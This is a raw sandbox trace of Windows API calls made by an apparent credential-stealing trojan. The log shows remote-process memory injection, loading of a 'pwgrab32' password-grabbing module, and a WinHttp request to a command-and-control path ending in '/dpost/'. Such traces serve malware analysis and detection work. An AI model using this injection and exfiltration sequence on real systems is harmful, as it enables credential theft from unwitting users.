	[0198.207] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.208] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.209] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.209] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.209] lstrlenA (lpString="memchr") returned 6
	[0198.209] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.209] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.210] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.210] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.210] lstrlenA (lpString="strncat") returned 7
	[0198.210] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.211] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.211] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.212] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc63c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0198.212] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc63c, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=13 | out: lpWideCharStr="WTSAPI32.dll") returned 13
	[0198.212] lstrlenW (lpString="WTSAPI32.dll") returned 12
	[0198.212] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.212] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.219] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.219] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.219] lstrlenA (lpString="WTSQueryUserToken") returned 17
	[0198.219] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.220] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.220] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.221] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bca94, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0198.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bca94, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=12 | out: lpWideCharStr="SHELL32.dll") returned 12
	[0198.221] lstrlenW (lpString="SHELL32.dll") returned 11
	[0198.221] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.221] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.224] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.224] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.224] lstrlenA (lpString="SHGetSpecialFolderPathA") returned 23
	[0198.224] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.225] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.226] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.226] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bcaec, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0198.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bcaec, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=11 | out: lpWideCharStr="WS2_32.dll") returned 11
	[0198.226] lstrlenW (lpString="WS2_32.dll") returned 10
	[0198.226] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.226] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.229] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.229] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.230] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.230] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.231] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.231] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.232] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.232] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.232] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.233] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.233] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.233] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.234] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0198.234] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0198.234] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0198.234] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0198.234] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0198.234] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0198.234] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0198.234] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0198.234] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0198.234] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0198.234] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x10001000, dwSize=0xc8c58, flNewProtect=0x20, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.237] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x100ca000, dwSize=0x2391e, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.238] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x100ee000, dwSize=0x1f698, flNewProtect=0x4, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.238] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x1010e000, dwSize=0x9, flNewProtect=0x4, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.239] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x1010f000, dwSize=0x230, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.239] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x10110000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.239] VirtualProtectEx (in: hProcess=0x4a8, lpAddress=0x10111000, dwSize=0x7358, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0198.239] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128650, nSize=0x70, lpNumberOfBytesRead=0x128630 | out: lpBuffer=0x128650*, lpNumberOfBytesRead=0x128630*=0x70) returned 1
	[0198.239] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.239] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.239] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x2307d98*, nSize=0x14, lpNumberOfBytesWritten=0x128628 | out: lpBuffer=0x2307d98*, lpNumberOfBytesWritten=0x128628*=0x14) returned 1
	[0198.240] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128650*, nSize=0x70, lpNumberOfBytesWritten=0x128628 | out: lpBuffer=0x128650*, lpNumberOfBytesWritten=0x128628*=0x70) returned 1
	[0198.240] ResetEvent (hEvent=0x498) returned 1
	[0198.240] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.252] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128650, nSize=0x70, lpNumberOfBytesRead=0x128628 | out: lpBuffer=0x128650*, lpNumberOfBytesRead=0x128628*=0x70) returned 1
	[0198.252] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0198.252] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307d98) returned 1
	[0198.252] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26a4060) returned 1
	[0198.254] lstrlenA (lpString="pwgrab32") returned 8
	[0198.254] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.254] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x22ad360*, nSize=0x9, lpNumberOfBytesWritten=0x128b6c | out: lpBuffer=0x22ad360*, lpNumberOfBytesWritten=0x128b6c*=0x9) returned 1
	[0198.254] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0198.255] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x128ef4*, nSize=0x400, lpNumberOfBytesWritten=0x128b6c | out: lpBuffer=0x128ef4*, lpNumberOfBytesWritten=0x128b6c*=0x400) returned 1
	[0198.255] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x184, flAllocationType=0x3000, flProtect=0x40) returned 0x360000
	[0198.255] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x360000, lpBuffer=0x128cf0*, nSize=0x184, lpNumberOfBytesWritten=0x128b68 | out: lpBuffer=0x128cf0*, lpNumberOfBytesWritten=0x128b68*=0x184) returned 1
	[0198.256] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ad0 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ad0*=0x70) returned 1
	[0198.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0198.256] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x470000
	[0198.256] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x470000, lpBuffer=0x22a5b60*, nSize=0x28, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x22a5b60*, lpNumberOfBytesWritten=0x128ac8*=0x28) returned 1
	[0198.256] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128af0*, nSize=0x70, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesWritten=0x128ac8*=0x70) returned 1
	[0198.257] ResetEvent (hEvent=0x498) returned 1
	[0198.257] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.932] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ac8*=0x70) returned 1
	[0198.932] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0198.932] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0198.932] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x128ef4, nSize=0x400, lpNumberOfBytesRead=0x128b80 | out: lpBuffer=0x128ef4*, lpNumberOfBytesRead=0x128b80*=0x400) returned 1
	[0198.933] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0198.933] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0198.933] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0198.933] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5fcd8fc0, dwHighDateTime=0x1d50a6a)) 
	[0198.933] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5fcd8fc0, dwHighDateTime=0x1d50a6a)) 
	[0198.933] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.933] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0198.933] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0198.933] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0198.933] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0198.933] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/dpost/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0198.933] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x127b44, dwBufferLength=0x4) returned 1
	[0198.933] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0199.494] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0199.495] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x127b34, lpdwBufferLength=0x127b30, lpdwIndex=0x0 | out: lpBuffer=0x127b34*, lpdwBufferLength=0x127b30*=0x4, lpdwIndex=0x0) returned 1
	[0199.495] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x28f) returned 1
	[0199.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x290) returned 0x271f00
	[0199.495] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x271f00, dwNumberOfBytesToRead=0x28f, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x271f00*, lpdwNumberOfBytesRead=0x127b30*=0x28f) returned 1
	[0199.495] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x111) returned 1
	[0199.496] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x271f00, Size=0x3a0) returned 0x2890c18
	[0199.496] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x2890ea7, dwNumberOfBytesToRead=0x111, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x2890ea7*, lpdwNumberOfBytesRead=0x127b30*=0x111) returned 1
	[0199.496] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x0) returned 1
	[0199.497] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307d98) returned 1
	[0199.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2756bf0
	[0199.497] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.498] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.498] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0199.498] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0199.498] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307d98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2307d98, pdwDataLen=0x1283b0) returned 1
	[0199.498] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.498] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.499] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.500] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.500] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0199.500] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0199.500] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23078c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23078c0, pdwDataLen=0x1283b0) returned 1
	[0199.500] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.500] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.500] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.501] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.501] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0199.501] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307898
	[0199.502] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307898, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2307898, pdwDataLen=0x1283b0) returned 1
	[0199.502] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.502] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.502] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.503] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.503] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0199.503] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0199.503] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23079d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23079d8, pdwDataLen=0x1283b0) returned 1
	[0199.503] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.503] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.503] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.505] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.505] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0199.505] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690790
	[0199.505] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690790, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690790, pdwDataLen=0x1283b0) returned 1
	[0199.505] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.505] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.505] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.506] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.506] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0199.506] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690830
	[0199.506] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690830, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690830, pdwDataLen=0x1283b0) returned 1
	[0199.506] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.506] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.506] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.506] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.506] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0199.506] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690858
	[0199.506] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690858, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690858, pdwDataLen=0x1283b0) returned 1
	[0199.506] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.506] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.506] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.507] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.507] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0199.507] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690768
	[0199.507] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690768, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690768, pdwDataLen=0x1283b0) returned 1
	[0199.507] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.507] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.507] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.508] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.508] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0199.508] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690740
	[0199.508] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690740, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690740, pdwDataLen=0x1283b0) returned 1
	[0199.508] CryptDestroyHash (hHash=0x22b6600) returned 1
